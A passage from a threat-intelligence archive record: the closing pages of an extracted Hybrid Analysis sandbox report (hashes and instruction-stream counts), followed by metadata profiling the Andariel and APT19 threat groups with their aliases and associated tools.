stream_type\":2,\"instructions\":69},\"18347-1472-10028C88\":{\"uid\":\"18347-1472-\r\n10028C88\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":665},\"18347-1738-10002180\":{\"uid\":\"18347-1738-\r\n10002180\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":48},\"18347-1395-1002A598\":{\"uid\":\"18347-1395-\r\n1002A598\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":608},\"18347-2005-1000BB5D\":{\"uid\":\"18347-2005-\r\n1000BB5D\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":289},\"18347-757-10074198\":{\"uid\":\"18347-757-\r\n10074198\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":677},\"18347-178-10012394\":{\"uid\":\"18347-178-\r\n10012394\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":628},\"18347-1311-100345E8\":{\"uid\":\"18347-1311-\r\n100345E8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":659},\"18347-2830-1001BBAA\":{\"uid\":\"18347-2830-\r\n1001BBAA\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":107},\"18347-319-100801D8\":{\"uid\":\"18347-319-\r\n100801D8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":635},\"18347-1904-10017062\":{\"uid\":\"18347-1904-\r\n10017062\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":83},\"18347-4339-1000C27A\":{\"uid\":\"18347-4339-\r\n1000C27A\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":5},\"18347-4412-1000C716\":{\"uid\":\"18347-4412-\r\n1000C716\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":15},\"18347-1805-1000C742\":{\"uid\":\"18347-1805-\r\n1000C742\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":37},\"18347-1447-1002B298\":{\"uid\":\"18347-1447-\r\n1002B298\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":248},\"18347-2411-1004C91E\":{\"uid\":\"18347-2411-\r\n1004C91E\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":233},\"18347-682-1006AE38\":{\"uid\":\"18347-682-\r\n1006AE38\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 24 of 25\n\n00002080\",\"stream_type\":2,\"instructions\":554},\"18347-183-1001ABB2\":{\"uid\":\"18347-183-\r\n1001ABB2\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":500},\"18347-1803-1000C7A9\":{\"uid\":\"18347-1803-\r\n1000C7A9\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":22},\"18347-1223-1003ED9C\":{\"uid\":\"18347-1223-\r\n1003ED9C\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":500},\"18347-1683-10002210\":{\"uid\":\"18347-1683-\r\n10002210\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":25},\"18347-1682-10002600\":{\"uid\":\"18347-1682-\r\n10002600\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":23},\"18347-1809-1000C28E\":{\"uid\":\"18347-1809-\r\n1000C28E\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":54},\"18347-1219-10042F79\":{\"uid\":\"18347-1219-\r\n10042F79\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":589},\"18347-3759-1006C6C8\":{\"uid\":\"18347-3759-\r\n1006C6C8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":468},\"18347-2324-10047D98\":{\"uid\":\"18347-2324-\r\n10047D98\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":489},\"18347-3603-10060E28\":{\"uid\":\"18347-3603-\r\n10060E28\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":483},\"18347-811-1005D6D8\":{\"uid\":\"18347-811-\r\n1005D6D8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":196},\"18347-1875-10017A9C\":{\"uid\":\"18347-1875-\r\n10017A9C\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":186},\"18347-2369-1004F106\":{\"uid\":\"18347-2369-\r\n1004F106\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":499},\"18347-1136-1003D543\":{\"uid\":\"18347-1136-\r\n1003D543\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":494},\"18347-1887-10017160\":{\"uid\":\"18347-1887-\r\n10017160\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":171},\"18347-878-1005EA68\":{\"uid\":\"18347-878-\r\n1005EA68\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":465},\"18347-2716-100136FA\":{\"uid\":\"18347-2716-\r\n100136FA\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":71},\"18347-1725-10001900\":{\"uid\":\"18347-1725-\r\n10001900\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":82},\"18347-1367-100304A8\":{\"uid\":\"18347-1367-\r\n100304A8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":458},\"18347-827-10064568\":{\"uid\":\"18347-827-\r\n10064568\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":497},\"18347-2097-100282B8\":{\"uid\":\"18347-2097-\r\n100282B8\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":192},\"18347-146-10008302\":{\"uid\":\"18347-146-\r\n10008302\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":494},\"18347-798-10065F68\":{\"uid\":\"18347-798-\r\n10065F68\",\"file_uid\":\"f6a4e3b12aa0e4e0ade8529b87b973c540a0df559818c9c0a437b5deb3e1333c\",\"child_target_uid\":\"00013784-\r\n00002080\",\"stream_type\":2,\"instructions\":428}},\"similar_samples\":true,\"search_button\":true,\"search_button_number_of\":3}\r\nSource: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nhttps://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
	],
	"report_names": [
		"ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1f3cf3d1-4764-4158-a216-dd6352e671bb",
			"created_at": "2022-10-25T15:50:23.837615Z",
			"updated_at": "2026-04-10T02:00:05.322197Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"APT19",
				"Codoso",
				"C0d0so0",
				"Codoso Team",
				"Sunshop Group"
			],
			"source_name": "MITRE:APT19",
			"tools": [
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0639667a-fb3f-43d9-a38c-6c123fd19c7f",
			"created_at": "2022-10-25T16:07:23.335869Z",
			"updated_at": "2026-04-10T02:00:04.547702Z",
			"deleted_at": null,
			"main_name": "APT 19",
			"aliases": [
				"APT 19",
				"Bronze Firestone",
				"C0d0so0",
				"Checkered Typhoon",
				"Codoso",
				"Deep Panda",
				"G0009",
				"G0073",
				"Operation Kingslayer",
				"Red Pegasus",
				"Sunshop Group",
				"TG-3551"
			],
			"source_name": "ETDA:APT 19",
			"tools": [
				"Agentemis",
				"C0d0so0",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"EmPyre",
				"EmpireProject",
				"Fire Chili",
				"PowerShell Empire",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46a151bd-e4c2-46f9-aee9-ee6942b01098",
			"created_at": "2023-01-06T13:46:38.288168Z",
			"updated_at": "2026-04-10T02:00:02.911919Z",
			"deleted_at": null,
			"main_name": "APT19",
			"aliases": [
				"DEEP PANDA",
				"Codoso",
				"KungFu Kittens",
				"Group 13",
				"G0009",
				"G0073",
				"Checkered Typhoon",
				"Black Vine",
				"TEMP.Avengers",
				"PinkPanther",
				"Shell Crew",
				"BRONZE FIRESTONE",
				"Sunshop Group"
			],
			"source_name": "MISPGALAXY:APT19",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434023,
	"ts_updated_at": 1775792094,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.pdf",
		"text": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.txt",
		"img": "https://archive.orkl.eu/a1e53aa284db83d833dd6e87d72502b4e9c192f8.jpg"
	}
}